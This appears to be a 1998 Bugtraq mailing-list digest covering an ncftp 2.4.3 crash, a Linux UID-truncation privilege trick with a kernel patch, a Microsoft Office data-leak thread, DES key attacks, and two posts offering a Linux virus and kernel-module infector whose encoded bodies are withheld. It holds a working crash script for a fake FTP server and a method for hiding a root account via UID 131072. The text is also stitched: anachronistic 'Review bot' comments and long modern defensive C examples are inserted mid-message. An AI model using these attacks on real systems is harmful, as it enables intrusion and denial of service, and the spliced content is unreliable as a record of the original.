Date: 	Tue, 23 Jun 1998 00:04:59 -0400
Reply-To: Bugtraq List 
Sender: Bugtraq List 
From: Automatic digest processor 
Subject:  BUGTRAQ Digest - 19 Jun 1998 to 22 Jun 1998
To: Recipients of BUGTRAQ digests 
Message-Id: <19980623040705Z96081-31225+22@brimstone.netspace.org>

There are 9 messages totalling 699 lines in this issue.

Topics of the day:

  1. CISCO PIX Vulnerability
  2. Microsoft Insecurity... (2)
  3. ncftp 2.4.3 bug (3)
  4. Linux kernel: sys_set*id(uid_t...) confusion
  5.  (2)

----------------------------------------------------------------------

Date:    Sat, 20 Jun 1998 10:24:54 -0300
From:    Jamie Thain 
Subject: Re: CISCO PIX Vulnerability

David,

David

> The simplest attack (``the Exabyte attack'') is to encrypt some
> common plaintext block (e.g. "\nlogin: ") under all 2^48 possible
> keys, and store the 2^48 ciphertext results on a big Exabyte tape;
> then each subsequent link-encryption key can be broken with O(1)
> effort.  Thanks to the ECB mode, such a common plaintext block
> should be easy to find.  (With a real chaining mode, these attacks
> are not possible under a ciphertext-only assumption, because the
> chaining vector serves as a kind of salt.)

Even if the cipher were a one byte char, the resulting data set size
would be 281,474 GB big; I have not heard of a 281TB tape drive yet.

> A much more practical approach would use Hellman's time-space
> tradeoff.  There, you'd need only about 2^32 space (e.g. $100 at
> Fry's for a cheap hard disk), plus you'd need to do a 2^48 precomputation.
> After the precomputation, each subsequent link-encryption key
> can be broken with about 2^32 trial encryptions.

This is 4GB, which is doable, but the resultant set of ciphertexts would
still be ~24GB big, which makes you want to have a really good reason.
Although with some dedicated hardware 281 trillion combinations could be
tried in a few minutes, and it would be broken.

regards:jamie

------------------------------

Date:    Mon, 22 Jun 1998 07:52:11 -0500
From:    Mike 
Subject: Microsoft Insecurity...

Well!  After an overwhelming response from everyone, just a summary of the
conclusions:

1.  This is a Microsoft Application problem, from Word, excel, etc from way
back as far as Word 2.0

2.  This has been reported before to Microsoft, without any kind of
response or patch, etc

3.  The problem is that the Microsoft Applications take RAM or Buffer
blocks to fill out application files - reading plaintext, etc,
indiscriminately.

4.  Suggestions to turn off the 'Fast Save' option help, but do not by any
means eliminate the problem.

5.  There is no other Fix - other than not attaching an application
document to send to anyone who could possibly use it maliciously.

6.  I think I have heard the opinions from everyone EXCEPT any sort of
Microsoft rep, surprised?

7.  It would be a simple fix of encrypting the 'fill' information with a
simple MD5 encryption or something similar, just to eliminate any plaintext.

Thanks to everyone for their suggestions and information....

Cheers

Mike

 --------------------------------------------------
| Mike Morton       DXStorm Geek Team Leader       |
|                                                  |
| mike@dxstorm.com  | DXShop ...Open For Business! |
 --------------------------------------------------
|   Quality Developers of Above Quality Solutions  |
|           http://www.dxshop.com                  |
 --------------------------------------------------

------------------------------

Date:    Sun, 21 Jun 1998 00:52:33 +0200
From:    Paul Boehm 
Subject: ncftp 2.4.3 bug

Hi,

I think I've found a bug in ncftp 2.4.3 (latest stable release)...
if you connect to an ftp server that responds with something like the
shit below, ncftp 2.4.3 segfaults. I think this is exploitable,
but had no time/motivation to look further into it.

Probably this isn't very dangerous anyway, because
your victim needs to connect willingly, and using ncftp, to your server..
that won't happen very often unless
you've been talking with your victim before.

Anyway, I thought it may be a good idea to post it, so here it is:

--snip-- ncftpcrashd.sh
#!/bin/bash
# ncftp2.4.3 crash by infected@cia.at
#   Start this using inetd. (port 21)

echo "331 hi, barbie.. wanna crash with me?"
echo "230 sure ken!"
echo "then hop in"
--snip--

every reply that looks like this works:
331 a
230 b
c[putting here some exploit code may work]

bye,
    paul

PS: I have no clue why this crashes ncftp... I haven't looked through
    ncftp's source, but maybe someone else will.

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Name: Paul S. Boehm               ||  Freelance Security Consulter.
    Email: paul@is.destructive.org  ||  PGPkey available at:
       Url: http://paul.boehm.org/  ||  http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is no reason for any individual to have a computer in their home.
              --Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

------------------------------

Date:    Fri, 19 Jun 1998 16:17:18 +0200
From:    Michal Zalewski 
Subject: Linux kernel: sys_set*id(uid_t...) confusion

Maybe this problem is well-known, but it seems not to be fixed yet:

'Physically', the UID is stored by the kernel in a single word. Due to this
limitation, UID/GID must satisfy the condition 0<=UID<=65535. But there are
serious problems with the kernel's sys_setuid(uid_t) and the uid_t type itself:

- uid_t (the UID/GID handling type), an unsigned integer, is able to handle
  large integers (>65535), e.g. 131072.

- sys_setuid(uid_t) and other kernel UID/GID manipulation routines
  (and their libc aliases, like setuid) silently strip the higher uid_t bits,
  then return the 'success' value (0).

So, an attacker may change the /etc/passwd UID of any account to 131072 (binary:
10 00000000 00000000) - it won't be traced by any intrusion-detection
programs looking for '0' UIDs, because uid_t is able to store this value,
and 131072 for sure is NOT equal to 0. But when he logs in using this
account he should get a root shell (setuid, as I noted above, silently
discards the two highest bits, so 131072 becomes 0).

Nice trick, but that's not all. If you have e.g. securetty installed to
prevent root logins from outside (or any other mechanism to prevent
unprivileged root access, e.g. restricted 'su'), the attacker will be able to
fool it, because the UID retrieved from /etc/passwd (uid_t) using standard
libc routines is NOT equal to 0, so this account looks
unprivileged...

Fixes:

First solution - rewrite the kernel UID/GID code to extend the UID address space
using e.g. 4 bytes instead of 2 (whoow!) - but it will probably harm many
programs.

Second solution - patch your kernel to return EINVAL when uid_t is too
big. Here's the patch:

--- linux/kernel/sys.c.orig     Tue Apr  8 17:47:47 1997
+++ linux/kernel/sys.c          Fri Jun 19 16:00:28 1998
@@ -237,6 +237,8 @@
 {
        int old_rgid = current->gid;
        int old_egid = current->egid;
+
+       if (rgid>0xffff || egid>0xffff) return -EINVAL;

        if (rgid != (gid_t) -1) {
                if ((old_rgid == rgid) ||
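Review bot: the new range check rejects the "leave unchanged" sentinel that the very next line relies on: `if (rgid != (gid_t) -1)` treats (gid_t)-1 as "do not change this id", and if gid_t is wider than 16 bits that value is far above 0xffff, so `if (rgid>0xffff || egid>0xffff) return -EINVAL;` makes every setregid() call that passes -1 for one of the ids fail. Exclude the sentinel from the test, e.g. check `rgid != (gid_t)-1 && rgid > 0xffff` for each argument. Conversely, if gid_t is only 16 bits at this level, the comparison can never be true and the truncation has already happened before the function body runs; the bound would then have to be enforced on the untruncated argument.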
@@ -272,6 +274,8 @@
 asmlinkage int sys_setgid(gid_t gid)
 {
        int old_egid = current->egid;
+
+       if (gid>0xffff) return -EINVAL;

        if (suser())
                current->gid = current->egid = current->sgid = current->fsgid = gid;
@@ -489,6 +493,8 @@
 asmlinkage int sys_setuid(uid_t uid)
 {
        int old_euid = current->euid;
+
+       if (uid>0xffff) return -EINVAL;

        if (suser())
                current->uid = current->euid = current->suid = current->fsuid = uid;
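Review bot: the effectiveness of `if (uid>0xffff) return -EINVAL;` depends entirely on the width of uid_t in this prototype, `asmlinkage int sys_setuid(uid_t uid)`: if the kernel's uid_t is a 16-bit type, the value has already been truncated by the time the body runs and the check is dead code, while the high-bit loss the write-up describes is exactly that truncation. State which width uid_t has in the tree this patch targets, or take the argument in a wider type and check it before assigning to current->uid and friends. The same literal bound is also repeated in six places; a single helper or macro would keep the limit in one spot.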
@@ -510,6 +516,8 @@
 asmlinkage int sys_setfsuid(uid_t uid)
 {
        int old_fsuid = current->fsuid;
+
+       if (uid>0xffff) return -EINVAL;

        if (uid == current->uid || uid == current->euid ||
            uid == current->suid || uid == current->fsuid || suser())
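Review bot: sys_setfsuid() has a different return convention from the other calls patched here: as `int old_fsuid = current->fsuid;` indicates, it returns the previous fsuid rather than 0 or -errno, so callers that interpret the result as an id will not recognise -EINVAL as a failure. Either document that a negative return now signals an error, or reject the oversized value without changing the contract (leave fsuid untouched and return old_fsuid).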
@@ -525,6 +533,8 @@
 asmlinkage int sys_setfsgid(gid_t gid)
 {
        int old_fsgid = current->fsgid;
+
+       if (gid>0xffff) return -EINVAL;

        if (gid == current->gid || gid == current->egid ||
            gid == current->sgid || gid == current->fsgid || suser())
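Review bot: same concern as for sys_setfsuid(): this function returns the old fsgid (`int old_fsgid = current->fsgid;`), so `return -EINVAL;` changes its return contract, and callers treating the result as an id will not see it as an error. Prefer rejecting the value by leaving fsgid unchanged and returning old_fsgid.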
@@ -563,6 +573,8 @@
 asmlinkage int sys_setpgid(pid_t pid, pid_t pgid)
 {
        struct task_struct * p;
+
+       if (pid>0xffff || pgid>0xffff) return -EINVAL;

        if (!pid)
                pid = current->pid;
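Review bot: this hunk applies the UID/GID bound to pid_t values (`if (pid>0xffff || pgid>0xffff) return -EINVAL;`), but the write-up only justifies the 16-bit limit for uid_t/gid_t and /etc/passwd entries; if pid_t is stored and compared at full width, rejecting process ids above 0xffff is an unrelated behaviour change. Either explain why process ids need the same bound or drop this hunk from the patch.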

_______________________________________________________________________
Michal Zalewski [lcamtuf@boss.staszic.waw.pl] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
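The post's point for defenders is that an intrusion-detection check which only looks for a literal UID of 0 misses an account whose numeric id is larger than 65535 but whose low 16 bits are all zero. The following audit helper is an added example and is not part of the post or of any existing tool; it parses /etc/passwd-style lines, classifies the UID and GID fields against the 16-bit limit the post describes, and generalizes from the post's single value (131072) to any id whose low 16 bits are zero (65536, 196608, ...). The sample lines, the 0xffff mask and the function names are constructed for this illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

/* Added example (not from the post): audit passwd-style lines for UID/GID
 * values above the 16-bit range, and in particular for values whose low
 * 16 bits are zero, i.e. ones a kernel that silently truncates would treat
 * as 0. The mask below models that truncation; it is an assumption of this
 * example, not a kernel constant. */
#define ID_MAX16 0xffffUL

enum id_verdict {
    ID_MALFORMED = -1,        /* line or numeric field could not be parsed */
    ID_OK = 0,                /* 1..65535 */
    ID_ROOT = 1,              /* literally 0 (expected only for the root account) */
    ID_OUT_OF_RANGE = 2,      /* > 65535, would be truncated to some other id */
    ID_TRUNCATES_TO_ROOT = 3  /* > 65535 with low 16 bits zero: becomes 0 */
};

/* Parse an unsigned decimal field of known length; reject empty, signed or
 * non-numeric values instead of letting strtoul quietly accept them. */
static int parse_id(const char *s, size_t len, unsigned long *out)
{
    char buf[32];
    char *end;
    if (len == 0 || len >= sizeof buf) return -1;
    memcpy(buf, s, len);
    buf[len] = '\0';
    if (buf[0] == '-' || buf[0] == '+') return -1;
    errno = 0;
    *out = strtoul(buf, &end, 10);
    if (errno != 0 || *end != '\0') return -1;
    return 0;
}

/* Classify one numeric id against the 16-bit limit. */
enum id_verdict classify_id(unsigned long id)
{
    if (id == 0) return ID_ROOT;
    if (id <= ID_MAX16) return ID_OK;
    /* Above 65535: keeping only the low 16 bits models the truncation. */
    return ((id & ID_MAX16) == 0) ? ID_TRUNCATES_TO_ROOT : ID_OUT_OF_RANGE;
}

/* Check the UID (field 3) and GID (field 4) of one passwd line and return
 * the more severe of the two verdicts. */
enum id_verdict check_passwd_line(const char *line)
{
    const char *field[4];
    size_t flen[4];
    const char *p = line;
    for (int i = 0; i < 4; i++) {
        const char *colon = strchr(p, ':');
        if (colon == NULL) return ID_MALFORMED;   /* fewer than four fields */
        field[i] = p;
        flen[i] = (size_t)(colon - p);
        p = colon + 1;
    }
    unsigned long uid, gid;
    if (parse_id(field[2], flen[2], &uid) != 0 ||
        parse_id(field[3], flen[3], &gid) != 0)
        return ID_MALFORMED;
    enum id_verdict vu = classify_id(uid), vg = classify_id(gid);
    return vu > vg ? vu : vg;
}

/* Constructed sample file: root, one normal account, and one account set
 * up the way the post describes (UID 131072). */
static const char *const sample_passwd[] = {
    "root:x:0:0:root:/root:/bin/sh",
    "alice:x:1000:100:Alice:/home/alice:/bin/sh",
    "backup:x:131072:100:backup:/var/backups:/bin/sh",
};

/* Count lines whose UID or GID does not fit in 16 bits. */
int count_oversized_ids(const char *const *lines, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) {
        enum id_verdict v = check_passwd_line(lines[i]);
        if (v == ID_OUT_OF_RANGE || v == ID_TRUNCATES_TO_ROOT) hits++;
    }
    return hits;
}

int count_oversized_in_sample(void)
{
    return count_oversized_ids(sample_passwd, 3);
}

int main(void)
{
    static const char *const names[] = { "malformed", "ok", "root",
                                         "out of 16-bit range",
                                         "TRUNCATES TO ROOT" };
    for (size_t i = 0; i < 3; i++)
        printf("%-50s %s\n", sample_passwd[i],
               names[check_passwd_line(sample_passwd[i]) + 1]);
    return 0;
}
```

Any line reported as ID_OUT_OF_RANGE or ID_TRUNCATES_TO_ROOT deserves a look regardless of whether the kernel in use truncates, since no legitimate account on a 16-bit-UID system should carry such a value; ID_ROOT on an account other than root is the classic check this one supplements.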

------------------------------

Date:    Sun, 21 Jun 1998 12:51:54 +0200
From:    stealth@CYBERSPACE.ORG
Subject: 

hi again,
now I send you an incredible module-infector that works
on linux 2.0.33 with kerneld running. Please let me know
if you successfully received this package.
uudecode was used again.
cya,

Stealthf0rk  


begin 640 lkm-infector.zip
[uuencoded binary attachment; the encoded data is corrupted in this copy and is not reproduced]
end

------------------------------

Date:    Sun, 21 Jun 1998 12:52:56 +0200
From:    stealth@CYBERSPACE.ORG
Subject: 

hi all,
I send you a virus that infects ELF-files non-overwriting.
please send me an email and tell me if it works on your systems
(on my sys it still works of course ...) if you received this package.
I guess that you use uudecode to get LinuxVirus.tgz ;) .
thanx,

Stealthf0rk     


begin 640 LinuxVirus.tgz
[uuencoded binary attachment; the encoded data is corrupted in this copy and is not reproduced]
end

------------------------------

Date:    Mon, 22 Jun 1998 13:11:04 -0500
From:    Mike Gleason 
Subject: Re: ncftp 2.4.3 bug

At 09:57 AM 6/22/98 -0500, Shaw Terwilliger  wrote:

>I hope you sent this to Mike Gleason before BugTraq...

Of course he didn't.  It wouldn't do much good if I could post an official
patch before there was widespread exploitation of the bug.  After all, the
more damage the bug causes, the more prestige he had to gain at my expense.
However, I do subscribe to this list, and had been working on this problem
(see below).

> you're not helping
>anyone by excluding the author from your audience.  How do you think bugs
>are going to get fixed if you never tell the author [...] ?

Agreed.  This is irresponsible and inexcusable behavior, especially
considering my e-mail address is displayed every single time you run the
program.  But it'll keep happening too, as long as these self-appointed
security experts exist with their own agendas.  Michael at Cygnus
experienced this problem with SN not too long ago, and of course I did as
well a few months ago.


> [...] Paul Boehm  wrote:
>> i think i've found a bug in ncftp 2.4.3 (latest stable release)...
>> if you connect to a ftp server that responds with something like the
>> shit below ncftp2.4.3 segfaults. i think this is exploitable,
>> but had no time/motivation to look further into it.


>> every reply that looks like this works:
>> 331 a
>> 230 b
>> c[putting here some exploit code may work]

>> PS: i have no clue why this crashes ncftp... i haven't looked through
>>     ncftp's source

>>but maybe someone else will.

Did you ever think that perhaps the author would?

He didn't seem to have enough time to make a cursory investigation into why
this happens or at least report it to me, but oddly he had plenty of time
to post to this list about it.  At least the last guy spent enough time to
write an exploit to prove in fact that it was a bug and needed a fix ASAP.

As for this particular bug, it crashes because ncftp 2.x was trying to copy
from a NULL pointer.  So, no buffer exploit.  Version 3 (still beta)
handles it just fine.  The official gospel is to upgrade to version 3,
since the bug doesn't occur naturally in the wild.

BTW, Thanks Shaw for making sure I knew about it.  Luckily there are still
more responsible Netizens out there than not.
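The root cause given above is a copy from a NULL pointer when a reply line carries no numeric code. The parser below is an added example, not ncftp's code and not derived from it; it shows the check a client needs so that an FTP reply line which does not start with a valid three-digit code (such as the third line the crash script sends) is reported as a protocol error instead of being dereferenced. The function names, the wrappers and the sample lines are constructed for this illustration; the line format itself is the one RFC 959 specifies.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example: a defensive parser for FTP reply lines (RFC 959: three
 * digits, then ' ' for the final line of a reply or '-' for a continuation
 * line). Not ncftp's code. */
enum ftp_line_kind {
    FTP_LINE_MALFORMED = -1,   /* no valid 3-digit code: treat as protocol error */
    FTP_LINE_FINAL = 0,        /* "NNN text" ends the reply */
    FTP_LINE_CONTINUATION = 1  /* "NNN-text" is part of a multi-line reply */
};

enum ftp_line_kind parse_ftp_reply_line(const char *line, int *code,
                                        char *text, size_t textlen)
{
    if (line == NULL || code == NULL || text == NULL || textlen == 0)
        return FTP_LINE_MALFORMED;
    /* Validate the code digit by digit, stopping at the first non-digit,
     * so a short line never causes a read past its terminating NUL. */
    for (int i = 0; i < 3; i++)
        if (!isdigit((unsigned char)line[i]))
            return FTP_LINE_MALFORMED;
    /* RFC 959: first digit 1-5, second digit 0-5. */
    if (line[0] < '1' || line[0] > '5' || line[1] > '5')
        return FTP_LINE_MALFORMED;
    char sep = line[3];
    if (sep != ' ' && sep != '-' && sep != '\0')
        return FTP_LINE_MALFORMED;
    *code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
    /* Copy the human-readable part, bounded, without the trailing CR/LF. */
    const char *src = (sep == '\0') ? line + 3 : line + 4;
    size_t n = 0;
    while (src[n] != '\0' && src[n] != '\r' && src[n] != '\n' && n + 1 < textlen) {
        text[n] = src[n];
        n++;
    }
    text[n] = '\0';
    return (sep == '-') ? FTP_LINE_CONTINUATION : FTP_LINE_FINAL;
}

/* Small wrappers so the verdict, the code and the text can be checked directly. */
int reply_kind_of(const char *line)
{
    int code; char text[128];
    return parse_ftp_reply_line(line, &code, text, sizeof text);
}

int reply_code_of(const char *line)
{
    int code = -1; char text[128];
    if (parse_ftp_reply_line(line, &code, text, sizeof text) == FTP_LINE_MALFORMED)
        return -1;
    return code;
}

int reply_text_is(const char *line, const char *expected)
{
    int code; char text[128];
    if (parse_ftp_reply_line(line, &code, text, sizeof text) == FTP_LINE_MALFORMED)
        return 0;
    return strcmp(text, expected) == 0;
}

/* Constructed sample: the three lines the crash script in the report sends. */
static const char *const sample_replies[] = {
    "331 hi, barbie.. wanna crash with me?\r\n",
    "230 sure ken!\r\n",
    "then hop in\r\n",
};

/* Count how many lines a robust client would reject. */
int count_malformed_replies(const char *const *lines, size_t n)
{
    int bad = 0;
    for (size_t i = 0; i < n; i++)
        if (reply_kind_of(lines[i]) == FTP_LINE_MALFORMED)
            bad++;
    return bad;
}

int count_malformed_in_sample(void)
{
    return count_malformed_replies(sample_replies, 3);
}

int main(void)
{
    for (size_t i = 0; i < 3; i++) {
        int code; char text[128];
        enum ftp_line_kind k = parse_ftp_reply_line(sample_replies[i], &code, text, sizeof text);
        if (k == FTP_LINE_MALFORMED)
            printf("line %zu: malformed reply, aborting session\n", i + 1);
        else
            printf("line %zu: code %d%s text \"%s\"\n", i + 1, code,
                   k == FTP_LINE_CONTINUATION ? " (continued)" : "", text);
    }
    return 0;
}
```

A client built on this returns an error to the user when the server's reply cannot be parsed; whether the original crash was a NULL copy or something else, the defensive rule is the same: never derive a pointer from a search over untrusted input and use it without checking the search succeeded.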

------------------------------

Date:    Mon, 22 Jun 1998 10:00:45 -0700
From:    Courteney van den Berg 
Subject: Re: Microsoft Insecurity...

This is an OLE structured storage problem, not a Microsoft application
problem (although very few non-Microsoft apps use OLE structured
storage).  It was fixed on Windows95 a long time ago by an OLE patch
(see MS KB article Q139432).  Microsoft need a kick in the pants for
leaving such an old bug in their latest release of MAC OLE though.  I
guess the MAC OLE source is probably based on an ancient version of the
PC OLE code.

CJ van den Berg
Computer Information Systems Department
CfaN
cjv@cfan.org

> -----Original Message-----
> From: Mike [mailto:mike@WOWDX.NET]
> Subject: Microsoft Insecurity...
>
> Well!  After an overwhelming response from everyone, just a
> summery of the
> conclusions:
>
> 1.  This is a Microsoft Application problem, from Word,
> excel, etc from way
> back as far as Word 2.0
>
> 2.  This has been reported before to Microsoft, without any kind of
> response or patch, etc
>
> 3.  The problem is that the Microsoft Applications take RAM or Buffer
> blocks to fill out application files - reading plaintext, etc,
> indiscriminately.
>
> 4.  Suggestions to turn off the 'Fast Save' option help, but
> do not by any
> means eliminate the problem.
>
> 5.  There is no other Fix - other than not attaching an application
> document to send to anyone who could possibly use it maliciously.
>
> 6.  I think I have heard the opinions from everyone EXCEPT any sort of
> Microsoft rep, surprised?
>
> 7.  It would be a simple fix of encrypting the 'fill'
> information with a
> simple MD5 encryption or something similar, just to eliminate
> any plaintext.
>
> Thanks to everyone for their suggestions and information....
>
> Cheers
>
> Mike

------------------------------

Date:    Mon, 22 Jun 1998 22:03:21 +0200
From:    Paul Boehm 
Subject: Re: ncftp 2.4.3 bug

On Mon, Jun 22, 1998 at 01:11:04PM -0500, Mike Gleason wrote:
> >I hope you sent this to Mike Gleason before BugTraq...
>
> Of course he didn't.  It wouldn't do much good if I could post an official
...
>  However, I do subscribe to this list, and had been working on this problem
> (see below).

from my mail's header:
From: Paul Boehm 
Subject:      ncftp 2.4.3 bug
X-cc:         mgleason@ncftp.com
To: BUGTRAQ@NETSPACE.ORG

I did CC you, but it's true I didn't send it to you before.
Maybe that wasn't enough... I'll next time try to contact the
author of a buggy program before I post about it to a public list.

Sorry for causing too much noise on this list, but I thought
this mail to the list, as an explanation, was necessary.

bye,
    paul

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Name: Paul S. Boehm               ||  Freelance Security Consulter.
    Email: paul@is.destructive.org  ||  PGPkey available at:
       Url: http://paul.boehm.org/  ||  http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is no reason for any individual to have a computer in their home.
              --Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

------------------------------

End of BUGTRAQ Digest - 19 Jun 1998 to 22 Jun 1998
**************************************************